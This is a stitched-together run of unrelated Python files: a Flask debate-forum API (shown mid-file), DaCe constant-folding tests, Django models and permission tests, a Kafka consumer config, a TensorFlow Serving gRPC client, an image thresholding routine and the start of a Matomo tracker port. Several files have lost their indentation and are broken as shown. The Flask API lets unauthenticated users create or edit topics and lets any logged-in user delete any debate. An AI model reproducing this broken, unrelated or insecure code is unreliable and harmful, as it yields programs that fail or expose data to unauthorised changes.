    unknown user, wrong password, or an internal error.
    """
    validated_data = validate_for_auth(request.json)
    try:
        if validated_data['result']:
            request_data = validated_data['data']
            request_pwd = request_data['password']
            manager = UserInfo.objects(email=request_data['email']).first()
            # compare the submitted password against the stored bcrypt hash
            if manager and flask_bcrypt.check_password_hash(
                    manager['password'], request_pwd):
                identify = {
                    'email': manager['email'],
                    'name': manager['name'],
                    'role': manager['role']
                }
                response = {
                    'status': 'SUCCESS',
                    'access_token': create_access_token(identity=identify),
                    'refresh_token': create_refresh_token(identity=identify)
                }
                return Response(json.dumps(response), mimetype="application/json", status=200)
            else:
                return Response(json.dumps({"result": False}), mimetype="application/json", status=200)
        else:
            return Response(json.dumps({"result": False}), mimetype="application/json", status=200)
    # NOTE(review): this broad except silently swallows all errors (and `e`
    # is unused) — consider logging the exception and returning 401/500
    except Exception as e:
        return Response(json.dumps({"result": False}), mimetype="application/json", status=200)
@app.route('/api/refresh', methods=['POST'])
@jwt_required(refresh=True)
def refresh():
    """Issue a fresh access token from a valid refresh token."""
    try:
        current_user = get_jwt_identity()
        print('USER', current_user)
        response = {
            'status': 'SUCCESS',
            'access_token': create_access_token(identity=current_user)
        }
    except Exception as e:
        # previously `response` was left unbound here, so the return below
        # raised UnboundLocalError; report the failure instead
        print(e)
        response = {'status': 'FAIL'}
    return Response(json.dumps(response), mimetype="application/json", status=200)
@app.route('/api/signup', methods=['POST'])
def register_manager():
    """Create a new UserInfo account unless the email is already taken."""
    payload = request.json
    result = {'status': 'SUCCESS'}
    if UserInfo.objects(email=payload['email']):
        # Duplicate email: report it and bail out (still HTTP 200).
        result['status'] = False
        result['message'] = "{} is already registered...".format(payload['email'])
        return Response(json.dumps(result), mimetype="application/json", status=200)
    hashed = flask_bcrypt.generate_password_hash(payload['password']).decode('utf-8')
    UserInfo(name=payload['name'], email=payload['email'], password=hashed).save()
    return Response(json.dumps(result), mimetype="application/json", status=201)
@app.route("/api/topic", methods=['GET'])
def topics_list():
topics_list = Topics.objects().to_json()
return Response(topics_list, mimetype="application/json", status=200)
@app.route("/api/topic/<int:topic_num>", methods=['GET'])
def topic_one(topic_num):
topic_one = Topics.objects(id=topic_num).first().to_json()
return Response(topic_one, mimetype="application/json", status=200)
@app.route("/api/topic", methods=['POST'])
def add_topic():
task = request.json
created_topic = Topics(
title=task['title'],
header=task['header'],
content=task['content']
).save()
print(created_topic)
return Response(created_topic.to_json(), mimetype="application/json", status=201)
@app.route("/api/topic", methods=['PUT'])
def modify_topic():
task = request.json
modified_topic = Topics(
id=task['_id'],
title=task['title'],
header=task['header'],
content=task['content']
).save()
print(modified_topic)
return Response("SUCCESS", mimetype="application/json", status=200)
@app.route("/api/topic/<int:topic_id>", methods=['DELETE'])
@jwt_required()
def delete_topic(topic_id):
current_user = get_jwt_identity()
if current_user['role'] != "Manager":
return Response("No permission", mimetype="application/json", status=200)
Topics.objects(id=topic_id).delete()
target_debate = DebateDetails.objects(topic_num=topic_id)
for element in target_debate:
LikeOnDebate.objects(debate_num=element['id']).delete()
UnLikeOnDebate.objects(debate_num=element['id']).delete()
element.delete()
return Response("SUCCESS", mimetype="application/json", status=200)
@app.route("/api/debates/<int:refer_num>", methods=['GET'])
def debate_list(refer_num):
get_data = DebateDetails.objects(topic_num=refer_num)
debate_list = []
for debate in get_data:
debate_dict = debate.to_mongo().to_dict()
user_info = UserInfo.objects(id=debate_dict['writer']).first()
debate_dict['username'] = user_info['name']
debate_dict['create_on'] = datetime.datetime.strftime(
debate.create_on, '%Y-%m-%d %H:%M:%S')
debate_dict['update_on'] = datetime.datetime.strftime(
debate.update_on, '%Y-%m-%d %H:%M:%S')
debate_list.append(debate_dict)
return Response(json.dumps(debate_list), mimetype="application/json", status=200)
@app.route("/api/debates", methods=['POST'])
@jwt_required()
def register_debate():
task = request.json
current_user = get_jwt_identity()
user = UserInfo.objects(email=current_user['email']).first()
created_detail = DebateDetails(
topic_num=task['topicNum'],
writer=user['id'],
content=task['content']
).save()
return Response("SUCCESS", mimetype="application/json", status=201)
@app.route("/api/debates/<int:debate_id>", methods=['DELETE'])
@jwt_required()
def delete_debate(debate_id):
target_debate = DebateDetails.objects(id=debate_id).first()
LikeOnDebate.objects(debate_num=target_debate['id']).delete()
UnLikeOnDebate.objects(debate_num=target_debate['id']).delete()
target_debate.delete()
return Response("SUCCESS", mimetype="application/json", status=200)
@app.route("/api/debates", methods=['PUT'])
@jwt_required()
def put_debate():
task = request.json
current_user = get_jwt_identity()
user = UserInfo.objects(email=current_user['email']).first()
DebateDetails(
id=task['_id'],
topic_num=task['topicNum'],
writer=user['id'],
content=task['content']
).save()
return Response("SUCCESS", mimetype="application/json", status=200)
@app.route("/api/like/<int:debate_num>", methods=['GET'])
@jwt_required()
def get_debate_like(debate_num):
current_user = get_jwt_identity()
user = UserInfo.objects(email=current_user['email']).first()
response = {
'like_cnt': LikeOnDebate.objects(debate_num=debate_num).count(),
'unlike_cnt': UnLikeOnDebate.objects(debate_num=debate_num).count(),
'liked': False if LikeOnDebate.objects(debate_num=debate_num, user_id=user['id']).count() == 0 else True,
'unliked': False if UnLikeOnDebate.objects(debate_num=debate_num, user_id=user['id']).count() == 0 else True
}
return Response(json.dumps(response), mimetype="application/json", status=200)
@app.route("/api/like", methods=['POST'])
@jwt_required()
def post_debate_like():
task = request.json
current_user = get_jwt_identity()
user = UserInfo.objects(email=current_user['email']).first()
if LikeOnDebate.objects(debate_num=task['debate_id'], user_id=user['id']).count() == 0:
LikeOnDebate(debate_num=task['debate_id'], user_id=user['id']).save()
if UnLikeOnDebate.objects(debate_num=task['debate_id'], user_id=user['id']).count() > 0:
UnLikeOnDebate.objects(
debate_num=task['debate_id'], user_id=user['id']).delete()
else:
LikeOnDebate.objects(
debate_num=task['debate_id'], user_id=user['id']).delete()
return Response("SUCCESS", mimetype="application/json", status=200)
@app.route("/api/unlike", methods=['POST'])
@jwt_required()
def post_debate_unlike():
task = request.json
current_user = get_jwt_identity()
user = UserInfo.objects(email=current_user['email']).first()
if UnLikeOnDebate.objects(debate_num=task['debate_id'], user_id=user['id']).count() == 0:
UnLikeOnDebate(
debate_num=task['debate_id'], user_id=user['id']).save()
if LikeOnDebate.objects(debate_num=task['debate_id'], user_id=user['id']).count() > 0:
LikeOnDebate.objects(
debate_num=task['debate_id'], user_id=user['id']).delete()
else:
UnLikeOnDebate.objects(debate_num=task['debate_id'],
user_id=user['id']).delete()
return Response("SUCCESS", mimetype="application/json", status=200)
if __name__ == "__main__":
app.run(debug=True, port=5500)
|
import nipype.pipeline as pe
from nipype.interfaces.utility import Function
# ToDo: not use a mutable argument for sg_args
def _check_if_iterable(to_iter, arg):
if not isinstance(arg, list):
arg = [arg] * len(to_iter)
return arg
# Module-level nipype Node wrapping _check_if_iterable so the broadcast can
# be wired into a workflow graph.
fix_iterable = pe.Node(Function(input_names=['to_iter', 'arg'], output_names='arg_fixed',
                                function=_check_if_iterable), name='fix_iterable')
|
# Copyright 2019-2021 ETH Zurich and the DaCe authors. All rights reserved.
""" Tests constant folding with globals. """
import dace
import numpy as np
from dace.frontend.python import astutils
from dace.frontend.python.newast import (GlobalResolver,
ConditionalCodeResolver,
DeadCodeEliminator)
from dace.frontend.python.parser import DaceProgram
class MyConfiguration:
    """Helper object whose attributes and properties feed the constant
    folding tests below."""

    def __init__(self, parameter):
        """Store twice the given parameter in ``p``."""
        self.p = parameter * 2

    @property
    def q(self):
        """Twice ``p`` (i.e. four times the original parameter)."""
        return self.p * 2

    def get_parameter(self):
        """Recover the original constructor argument."""
        return self.p // 2

    @staticmethod
    def get_random_number():
        """Deterministic on purpose so the tests can assert on it."""
        return 4

    @property
    def cloned(self):
        """A fresh MyConfiguration built from the recovered parameter."""
        return MyConfiguration(self.get_parameter())
# Globals that the dace frontend must resolve to constants at parse time.
N = 2
cfg = MyConfiguration(N)
val = 5
# Confuse AST parser with global of the same name as array
A = 5
@dace.program
def instantiated_global(A):
    # Every cfg.* access, the static method call and `val` must fold to
    # compile-time constants inside the dace program.
    A[cfg.q] = (A[cfg.get_parameter()] * MyConfiguration.get_random_number() +
                cfg.p) + val
def test_instantiated_global():
    """
    Tests constant/symbolic values with predetermined global values.
    """
    A = np.random.rand(10)
    # Reference computation with plain Python/NumPy semantics.
    expected = np.copy(A)
    expected[cfg.q] = (expected[cfg.get_parameter()] *
                       MyConfiguration.get_random_number() + cfg.p) + val
    instantiated_global(A)
    assert np.allclose(A, expected)
def test_nested_globals():
    """
    Tests constant/symbolic values with multiple nesting levels.
    """
    @dace.program
    def instantiated_global2(A):
        # cfg.cloned.p folds a property that constructs a new
        # MyConfiguration — i.e. two levels of global resolution.
        A[cfg.q] = cfg.cloned.p
    A = np.random.rand(10)
    reg_A = np.copy(A)
    reg_A[cfg.q] = cfg.cloned.p
    instantiated_global2(A)
    assert np.allclose(A, reg_A)
def _analyze_and_unparse_code(func: DaceProgram) -> str:
    """Run the dace global/conditional/dead-code AST passes on ``func``'s
    source and return the unparsed code that survives."""
    src_ast, _, _, _ = astutils.function_to_ast(func.f)
    # Globals visible to the program, minus its own arguments.
    resolved = {}
    for var_name, var_value in func.global_vars.items():
        if var_name not in func.argnames:
            resolved[var_name] = var_value
    for ast_pass in (GlobalResolver(resolved),
                     ConditionalCodeResolver(resolved),
                     DeadCodeEliminator()):
        src_ast = ast_pass.visit(src_ast)
    return astutils.unparse(src_ast)
def test_dead_code_elimination_if():
    """
    Tests dead code elimination with compile-time if conditions.
    """
    sym = dace.symbol('sym', positive=True)
    cfg_symbolic = MyConfiguration(sym)
    @dace.program
    def test(A):
        if cfg_symbolic.q > sym:
            return 2 * A
        else:
            return 4 * A
    # q == 4*sym and sym > 0, so the condition is provably true:
    # the else branch (4 * A) must be eliminated.
    parsed_code = _analyze_and_unparse_code(test)
    assert '4' not in parsed_code
    assert '2' in parsed_code
def test_dead_code_elimination_ifexp():
    """
    Tests dead code elimination with compile-time ternary expressions.
    """
    sym = dace.symbol('sym', positive=True)
    cfg_symbolic = MyConfiguration(sym)
    @dace.program
    def test(A):
        # q == 4*sym > sym for positive sym, so only `2 * A` survives.
        return 2 * A if cfg_symbolic.q > sym else 4 * A
    parsed_code = _analyze_and_unparse_code(test)
    assert '4' not in parsed_code
    assert '2' in parsed_code
def test_dead_code_elimination_noelse():
    """
    Tests dead code elimination with compile-time if conditions (without else).
    """
    scale = None
    @dace.program
    def test(A):
        # `scale is None` is decidable at parse time, so the trailing
        # `return scale * A` must be removed as unreachable.
        if scale is None:
            return 2 * A
        return scale * A
    parsed_code = _analyze_and_unparse_code(test)
    assert 'scale' not in parsed_code
    assert '2' in parsed_code
def test_dead_code_elimination_unreachable():
    """
    Tests dead code elimination with unreachable code.
    """
    @dace.program
    def test(A):
        if A[5] > 1:
            return 3 * A
            # Everything after a return in its block is unreachable.
            return 6 * A
        return 2 * A
        return 4 * A
    parsed_code = _analyze_and_unparse_code(test)
    assert '6' not in parsed_code and '4' not in parsed_code  # Dead code
    assert '5' in parsed_code and '1' in parsed_code  # Condition
    assert '3' in parsed_code and '2' in parsed_code  # Reachable code
# TODO: dace.constant should signal that argument evaluation is deferred to
# (nested) call time
# dace.constant = lambda x: None
# def test_constant_parameter():
# """
# Tests nested functions with constant parameters passed in as arguments.
# """
# @dace.program
# def nested_func(cfg: dace.constant(MyConfiguration), A: dace.float64[20]):
# return A[cfg.p]
# @dace.program
# def constant_parameter(
# cfg: dace.constant(MyConfiguration),
# cfg2: dace.constant(MyConfiguration), A: dace.float64[20]):
# A[cfg.q] = nested_func(cfg, A)
# A[MyConfiguration.get_random_number()] = nested_func(cfg2, A)
# cfg1 = MyConfiguration(3)
# cfg2 = MyConfiguration(4)
# A = np.random.rand(20)
# reg_A = np.copy(A)
# reg_A[12] = reg_A[6]
# reg_A[4] = reg_A[8]
# constant_parameter(cfg1, cfg2, A)
# assert np.allclose(A, reg_A)
if __name__ == '__main__':
    # Run each test directly (no pytest runner required).
    test_instantiated_global()
    test_nested_globals()
    test_dead_code_elimination_if()
    test_dead_code_elimination_ifexp()
    test_dead_code_elimination_noelse()
    test_dead_code_elimination_unreachable()
    # test_constant_parameter()
|
from django.db import models
class Contato(models.Model):
    # Address-book entry for a person.
    nome = models.CharField(max_length=50)  # full name
    endereco = models.CharField(max_length=200)  # postal address
    email = models.EmailField(max_length=100)
    data_nascimento = models.DateField()  # date of birth
    telefone = models.CharField(max_length=20)  # phone number
    def __str__(self):
        """Human-readable label shown e.g. in the Django admin."""
        return self.nome
class Livros(models.Model):
    # Library catalogue entry for a book.
    titulo = models.CharField(max_length=50)  # title
    autor = models.CharField(max_length=200)  # author
    assunto = models.CharField(max_length=100)  # subject
    editora = models.CharField(max_length=20)  # publisher
    isbn = models.CharField(max_length=20)
    ano = models.DateField()  # publication year (stored as a date)
    def __str__(self):
        """Human-readable label shown e.g. in the Django admin."""
        return self.titulo
# Create your models here.
|
#!/usr/bin/env python3
import csv
import gzip
import sys
import utils
# Trawls through the RU-IRA dataset and counts basic statistics within a
# specified time window.
if __name__=='__main__':
    # Usage: script <file[.gz]> <start-ts> <end-ts>
    fn = sys.argv[1]
    start_ts = utils.extract_ts_s(sys.argv[2], fmt=utils.DCW_TS_FORMAT)
    end_ts = utils.extract_ts_s(sys.argv[3], fmt=utils.DCW_TS_FORMAT)
    # Open outside any cleanup block: previously a failed open left `in_f`
    # unbound and the `finally: in_f.close()` raised NameError, masking the
    # real error. A `with` statement now guarantees the close.
    if fn[-1] in 'zZ':  # crude gzip detection by the filename's last letter
        in_f = gzip.open(fn, 'rt', encoding='utf-8')
    else:
        in_f = open(fn, 'r', encoding='utf-8')
    users = set()
    tweets = 0
    rts = 0
    row_count = 0
    with in_f:
        csv_reader = csv.DictReader(in_f)
        for row in csv_reader:
            row_count = utils.log_row_count(row_count, True)
            ts = utils.extract_ts_s(row['tweet_time'], fmt=utils.IRA_TS_FORMAT)
            if ts < start_ts or ts > end_ts: continue  # may not be in timestamp order
            tweets += 1
            users.add(row['userid'])
            if row['is_retweet'].lower() == 'true': rts += 1
    print('\nTweets: %10d' % tweets)
    print('Retweets: %10d' % rts)
    print('Accounts: %10d' % len(users))
|
import numpy as np
import matplotlib.pyplot as plt
import sys, os
sys.path.append("../../../toolbox")
from toolbox import plot as ph
import helpers
from pathlib import Path
sys.path.append("../../../gempy")
from gempy.assets import topology as tp
import scipy.stats
data_folder = Path("D:/datasets/paper_topology/03_gullfaks/")
simulation = Path("smc_jac_paper")
priors = helpers.load_priors(data_folder / simulation / "priors.json")
thresholds = [t for t in os.listdir(data_folder / simulation)
if os.path.isdir(data_folder / simulation / t)]
samples = {}
skip = ["vertices", "simplices", "centroids", "lb"] + list(priors.keys())
for t in thresholds:
samples[t] = helpers.load_samples(
data_folder / simulation / t,
skip=skip
)
nrows = len(samples.keys())
fig, axes = plt.subplots(
nrows=nrows,
figsize=ph.get_figsize(1, ratio=0.5)
)
for ax, (threshold, sample) in zip(axes, samples.items()):
print(f"threshold: {threshold}")
ax.set_title(str(threshold))
edges = sample.get("edges")
print(len(edges))
if not edges:
continue
u, c, idx = tp.count_unique_topologies(edges)
print(f"# unique topologies: {len(u)}")
# ax.bar(range(len(c)), c.sort())
plt.show()
|
from django.test import TestCase, Client
from django.urls import reverse
from guardian.shortcuts import assign_perm
from guardian.utils import get_anonymous_user
from rnapuzzles.models import CustomUser, Group as CustomGroup
class GroupView(TestCase):
    """Permission tests for the group list/detail/update views.

    Three users exercise the guardian permission matrix:
    - user_without: no group permissions at all
    - user_with: global (model-level) add/delete permissions on Group
    - user_object: change/delete permissions on the one test group only
    """
    def setUp(self):
        self.user_without = CustomUser.objects.create(email="a@a.pl")
        self.user_with = CustomUser.objects.create(email="b@a.pl")
        self.user_object = CustomUser.objects.create(email="c@a.pl")
        self.group = CustomGroup.objects.create(group_name="Test")
        # Model-level permissions for user_with (no object argument).
        assign_perm("rnapuzzles.delete_group", self.user_with)
        assign_perm("rnapuzzles.add_group", self.user_with)
        # Object-level permissions for user_object on self.group only.
        assign_perm("rnapuzzles.change_group", self.user_object, self.group)
        assign_perm("rnapuzzles.delete_group", self.user_object, self.group)
        self.client = Client()
    def test_list_with(self):
        # Globally-permissioned user sees the single group listed.
        self.client.force_login(self.user_with)
        response = self.client.get(reverse("groups_list"))
        self.assertEqual(response.status_code, 200)
        self.assertTrue(len(response.context["object_list"]) == 1)
    def test_list_object(self):
        # Object-level permissions suffice to see the group listed.
        self.client.force_login(self.user_object)
        response = self.client.get(reverse("groups_list"))
        print(response)
        self.assertEqual(response.status_code, 200)
        self.assertTrue(len(response.context["object_list"]) == 1)
    def test_list_without(self):
        # No permissions: the list renders but is empty.
        self.client.force_login(self.user_without)
        response = self.client.get(reverse("groups_list"))
        self.assertEqual(response.status_code, 200)
        self.assertTrue(len(response.context["object_list"]) == 0)
    def test_view_with(self):
        self.client.force_login(self.user_with)
        response = self.client.get(reverse("group_detail", args=[self.group.pk]))
        self.assertEqual(response.status_code, 200)
    def test_view_without(self):
        # Detail view is forbidden without any permission.
        self.client.force_login(self.user_without)
        response = self.client.get(reverse("group_detail", args=[self.group.pk]))
        self.assertEqual(response.status_code, 403)
    def test_view_object(self):
        self.client.force_login(self.user_object)
        response = self.client.get(reverse("group_detail", args=[self.group.pk]))
        self.assertEqual(response.status_code, 200)
    def test_update_with(self):
        # user_with holds only model-level perms (no change_group on the
        # object), so the update view redirects (302).
        self.client.force_login(self.user_with)
        response = self.client.get(reverse("group_update", args=[self.group.pk]))
        self.assertEqual(response.status_code, 302)
    def test_update_without(self):
        self.client.force_login(self.user_without)
        response = self.client.get(reverse("group_update", args=[self.group.pk]))
        self.assertEqual(response.status_code, 302)
    def test_update_object(self):
        # Only the object-level change permission holder may open the form.
        self.client.force_login(self.user_object)
        response = self.client.get(reverse("group_update", args=[self.group.pk]))
        self.assertEqual(response.status_code, 200)
|
#!/usr/bin/env python
# A simple recurrent neural network that learns a simple sequential data set.
__author__ = 'Tom Schaul, tom@idsia.ch and Daan Wierstra'
from datasets import AnBnCnDataSet #@UnresolvedImport
from pybrain.supervised import BackpropTrainer
from pybrain.structure import FullConnection, RecurrentNetwork, TanhLayer, LinearLayer, BiasUnit
def testTraining():
    """Train a small recurrent network on the sequential AnBnCn dataset
    and print the learned weights (file uses Python 2 print syntax)."""
    # the AnBnCn dataset (sequential)
    d = AnBnCnDataSet()
    # build a recurrent network to be trained
    hsize = 2
    n = RecurrentNetwork()
    n.addModule(TanhLayer(hsize, name = 'h'))
    n.addModule(BiasUnit(name = 'bias'))
    n.addOutputModule(LinearLayer(1, name = 'out'))
    n.addConnection(FullConnection(n['bias'], n['h']))
    n.addConnection(FullConnection(n['h'], n['out']))
    # the recurrent self-connection gives the net memory of past steps
    n.addRecurrentConnection(FullConnection(n['h'], n['h']))
    n.sortModules()
    # initialize the backprop trainer and train
    t = BackpropTrainer(n, learningrate = 0.1, momentum = 0.0, verbose = True)
    t.trainOnDataset(d, 200)
    # the resulting weights are in the network:
    print 'Final weights:', n.params
if __name__ == '__main__':
    # Demo entry point: run the training once when executed directly.
    testTraining()
|
from django.utils import timezone
from django.db import models
class BaseModel(models.Model):
    # Abstract base adding audit timestamps to every concrete model.
    c_at = models.DateTimeField(default=timezone.now)  # created-at, set on creation
    u_at = models.DateTimeField(auto_now=True)  # updated-at, refreshed on every save()
    class Meta:
        abstract = True
|
'''Bradley adaptive thresholding. Credit goes to http://stackoverflow.com/a/33092928/4414003
where user @rayryeng wrote an implementation much more efficient than mine. To see my original code,
visit that link.'''
import numpy as np
from PIL import Image
import time
def bradley_threshold(image, s=None, t=None):
    """Binarize ``image`` with Bradley adaptive thresholding.

    Each pixel is compared to the mean of an s-by-s window around it
    (computed via an integral image); pixels more than ``t`` percent
    darker than that local mean become black.

    Parameters
    ----------
    image : PIL.Image.Image or array-like
        Greyscale input.
    s : int, optional
        Window size; defaults to round(cols / 8).
    t : float, optional
        Threshold percentage; defaults to 15.0.

    Returns
    -------
    PIL.Image.Image
        Binary (0/255) image of the same size.
    """
    # np.float / np.bool were removed in NumPy 1.24; use the builtins.
    img = np.array(image).astype(float)
    # Default window size is round(cols/8)
    if s is None:
        s = np.round(img.shape[1] / 8)
    # Default threshold is 15% of the total area in the window
    if t is None:
        t = 15.0
    # Compute integral image
    intImage = np.cumsum(np.cumsum(img, axis=1), axis=0)
    # Define grid of points, flattened to 1D for easier access
    rows, cols = img.shape[:2]
    X, Y = np.meshgrid(np.arange(cols), np.arange(rows))
    X = X.ravel()
    Y = Y.ravel()
    # Ensure s is even AND integral: the corner coordinates below are used
    # as array indices, and float indices are an error in modern NumPy.
    s = int(s + np.mod(s, 2))
    half = s // 2
    # Access the four corners of each neighbourhood
    x1 = X - half
    x2 = X + half
    y1 = Y - half
    y2 = Y + half
    # Clamp out-of-bounds coordinates
    x1[x1 < 0] = 0
    x2[x2 >= cols] = cols - 1
    y1[y1 < 0] = 0
    y2[y2 >= rows] = rows - 1
    # Count how many pixels are in each (clamped) neighbourhood
    count = (x2 - x1) * (y2 - y1)
    # Integral-image corner indices for each window
    f1_x = x2
    f1_y = y2
    f2_x = x2
    f2_y = y1 - 1
    f2_y[f2_y < 0] = 0
    f3_x = x1 - 1
    f3_x[f3_x < 0] = 0
    f3_y = y2
    f4_x = f3_x
    f4_y = f2_y
    # Window sums via inclusion-exclusion on the integral image
    sums = intImage[f1_y, f1_x] - intImage[f2_y, f2_x] - intImage[f3_y, f3_x] + intImage[f4_y, f4_x]
    # Compute thresholded image and reshape into a 2D uint8 {0, 255} grid
    out = np.ones(rows * cols, dtype=bool)
    out[img.ravel() * count <= sums * (100.0 - t) / 100.0] = False
    out = 255 * np.reshape(out, (rows, cols)).astype(np.uint8)
    # Return PIL image back to user
    return Image.fromarray(out)
if __name__ == '__main__':
    # Quick demo: threshold a sample image and report wall-clock time.
    p = Image.open('../Test Images/test.jpg').convert('L')
    # Single-argument print() calls work identically on Python 2 and 3,
    # replacing the Python-2-only print statements.
    print(p.size)
    a = time.time()
    bradley_threshold(p).show()
    print(time.time() - a)
|
import os
from functools import partial
from pydantic import validator, AnyHttpUrl, Field
from wunderkafka.time import now
from wunderkafka import SRConfig, ConsumerConfig, SecurityProtocol, AvroConsumer
# If you are the fan of 12 factors, you may want to config via env variables
class OverridenSRConfig(SRConfig):
    # Schema Registry URL comes from the SCHEMA_REGISTRY_URL env var.
    url: AnyHttpUrl = Field(env='SCHEMA_REGISTRY_URL')
    @validator('sasl_username')
    def from_env(cls, v) -> str:
        """Always rebuild the SASL username from KRB5_USER/KRB5_REALM.

        NOTE: the incoming value ``v`` is deliberately ignored.
        """
        # And to use 'native' kerberos envs
        return '{0}@{1}'.format(os.environ.get('KRB5_USER'), os.environ.get('KRB5_REALM'))
# Or you want to override some defaults by default (pun intended)
class OverridenConfig(ConsumerConfig):
    # Consumer which do not commit messages automatically
    enable_auto_commit: bool = False
    # And knows nothing after restart due to new gid.
    # (now() is evaluated once, at class-definition/import time)
    group_id: str = 'wunderkafka-{0}'.format(now())
    # More 12 factors
    bootstrap_servers: str = Field(env='BOOTSTRAP_SERVER')
    security_protocol: SecurityProtocol = SecurityProtocol.sasl_ssl
    sasl_kerberos_kinit_cmd: str = ''
    sr: SRConfig = OverridenSRConfig()
    @validator('sasl_kerberos_kinit_cmd')
    def format_keytab(cls, v) -> str:
        """Default the kinit command from kerberos env vars when unset."""
        if not v:
            return 'kinit {0}@{1} -k -t {0}.keytab'.format(os.environ.get('KRB5_USER'), os.environ.get('KRB5_REALM'))
        # Still allowing to set it manually
        return str(v)
# After this you can partial your own Producer/Consumer, something like...
# NOTE: OverridenConfig() is instantiated here at import time, so the env
# lookups are frozen when this module loads.
MyConsumer = partial(AvroConsumer, config=OverridenConfig())
|
from .model_connector import ModelConnector
class GRPCConnector(ModelConnector):
    """ModelConnector talking to a TensorFlow Serving instance over gRPC."""
    @staticmethod
    def check_import():
        # Import-probe only: raises ImportError early if any dependency is
        # missing; the imported modules are intentionally unused here.
        import grpc
        import tensorflow as tf
        import tensorflow_serving
    def __init__(self, arg, name=''):
        """Open an insecure gRPC channel to ``arg`` (host:port) for the
        served model called ``name``."""
        super().__init__(arg)
        # warmup
        import grpc
        # noinspection PyUnresolvedReferences
        import tensorflow as tf  # tf serving needs tf ... which is a HUGE dependency
        # noinspection PyUnresolvedReferences
        import tensorflow_serving.apis
        from tensorflow_serving.apis import prediction_service_pb2_grpc
        assert name != '', "Name must be specified"
        # Per-RPC deadline in seconds.
        self.timeout = 60.0
        # Raise gRPC's default message-size cap to 100 MiB for big tensors.
        maximum_message_length = 100 * 1024 * 1024
        options = [
            ('grpc.max_message_length', maximum_message_length),
            ('grpc.max_receive_message_length', maximum_message_length),
        ]
        # TODO: support for secure channels?
        self.channel = grpc.insecure_channel(arg, options=options)
        self.stub = prediction_service_pb2_grpc.PredictionServiceStub(self.channel)
        self.name = name
    def get_signatures(self):
        """Return the model's signature names, sorted, minus the internal
        '__saved_model_init_op' entry."""
        from tensorflow_serving.apis import get_model_metadata_pb2
        mm = get_model_metadata_pb2.GetModelMetadataRequest()
        mm.model_spec.name = self.name
        mm.metadata_field.append('signature_def')
        result = self.stub.GetModelMetadata(mm, self.timeout)
        type_url = result.metadata['signature_def'].type_url
        value = result.metadata['signature_def'].value
        # Sanity-check the Any payload before parsing it as a SignatureDefMap.
        assert type_url == 'type.googleapis.com/tensorflow.serving.SignatureDefMap'
        signatures_map = get_model_metadata_pb2.SignatureDefMap()
        signatures_map.ParseFromString(value)
        signatures = list(
            sorted(
                name
                for name, signature_def in signatures_map.signature_def.items()
                if name != '__saved_model_init_op'
            )
        )
        return signatures
    def call(self, signature, data):
        """Run ``signature`` on ``data`` (fed as the 'image' input) and
        return the 'output_0' tensor as a NumPy array."""
        import tensorflow as tf
        from tensorflow_serving.apis import predict_pb2
        request = predict_pb2.PredictRequest()
        request.model_spec.name = self.name
        request.model_spec.signature_name = signature
        request.inputs['image'].CopyFrom(tf.make_tensor_proto(data))
        result = self.stub.Predict(request, self.timeout)
        tensor_proto = result.outputs['output_0']
        # TODO: make work for non-float32 types
        return tf.io.parse_tensor(tensor_proto.SerializeToString(), tf.float32).numpy()
|
from datetime import datetime
import hashlib
import json
import random
import re
import time
from urllib.parse import quote, parse_qs, urlencode
import uuid
def urlencode_plus(s):
    """URL-encode ``s``: percent-quote a string, or form-encode a dict.

    Raises TypeError for any other type.
    """
    # isinstance instead of `type(s) == str` so str/dict subclasses work too.
    if isinstance(s, str):
        return quote(s)
    if isinstance(s, dict):
        return urlencode(s)
    raise TypeError("urlencode_plus works only on strings and dicts.", s)
#
# This module is a hand-corrected version of an automated translation of the PHP MatomoTracker.
#
def is_int(x):
    """PHP is_int analogue (PEP 8: def instead of lambda assignment)."""
    return isinstance(x, int)
def is_list(x):
    """PHP is_array analogue for list payloads."""
    return isinstance(x, list)
def is_numeric(x):
    """Only used with float parameters in this module."""
    return isinstance(x, float)
def strpos(s, sub):
    """PHP-style strpos: index of ``sub`` in ``s``, or False when absent.

    NOTE: position 0 is falsy (PHP's classic strpos pitfall) — callers
    must compare against False, not truthiness.
    """
    # Single find() call instead of the original's double lookup.
    idx = s.find(sub)
    return idx if idx != -1 else False
def strspn(str1, str2, start=0, length=None):
    """PHP-style strspn: length of the initial run of str1[start:start+length]
    consisting only of characters found in str2.
    """
    if length is None:
        # `if not length` also caught an explicit length of 0, where PHP
        # returns 0; only substitute the default when length is omitted.
        length = len(str1)
    # re.escape: raw str2 inside a character class broke on '\' and gave
    # '-' range semantics; PHP strspn treats every character literally.
    return len(re.search("^[" + re.escape(str2) + "]*", str1[start : start + length]).group(0))
"""
* Matomo - free/libre analytics platform
* For more information, see README.md
* @license released under BSD License http://www.opensource.org/licenses/bsd-license.php
* @link https://matomo.org/docs/tracking-api/
* @category Matomo
* @package MatomoTracker
"""
class MatomoTracker:
    """
    MatomoTracker implements the Matomo Tracking Web API.
    For more information, see: https://github.com/matomo-org/matomo-php-tracker/
    * @package MatomoTracker
    * @api
    """
    # NOTE: the bare triple-quoted strings between the class attributes below
    # are PHP-doc blocks carried over from the PHP original; Python treats
    # them as no-op expression statements, not docstrings.
    """
    Matomo base URL, for example http://example.org/matomo/
    Must be set before using the class by calling
    MatomoTracker.URL = 'http://yourwebsite.org/matomo/'
    * @var string
    """
    URL = ""
    """
    API Version
    * @ignore
    * @var int
    """
    VERSION = 1
    """
    * @ignore
    """
    DEBUG_APPEND_URL = ""
    """
    Visitor ID length
    * @ignore
    """
    LENGTH_VISITOR_ID = 16
    """
    Charset
    * @see set_page_charset
    * @ignore
    """
    DEFAULT_CHARSET_PARAMETER_VALUES = "utf-8"
    """
    See matomo.js
    """
    FIRST_PARTY_COOKIES_PREFIX = "_pk_"
    """
    Defines how many categories can be used max when calling add_ecommerce_item().
    * @var int
    """
    MAX_NUM_ECOMMERCE_ITEM_CATEGORIES = 5
    DEFAULT_COOKIE_PATH = "/"
    def __init__(self, request, id_site, api_url=""):
        """
        Builds a MatomoTracker object, used to track visits, pages and Goal conversions
        for a specific website, by using the Matomo Tracking API.
        * @param dict request CGI-style environment mapping; HTTP_REFERER,
          REMOTE_ADDR, HTTP_ACCEPT_LANGUAGE and HTTP_USER_AGENT are read from it
        * @param int id_site Id site to be tracked
        * @param string api_url "http://example.org/matomo/" or "http://matomo.example.org/"
        If set, will overwrite MatomoTracker.URL
        """
        self.request = request
        self.request_method = "GET"
        self.ecommerceItems = []
        self.attributionInfo = []
        self.eventCustomVar = {}
        self.forcedDatetime = ""
        self.forcedNewVisit = False
        # Performance timing metrics (ms); see set_performance_timings().
        self.networkTime = 0
        self.serverTime = 0
        self.transferTime = 0
        self.domProcessingTime = 0
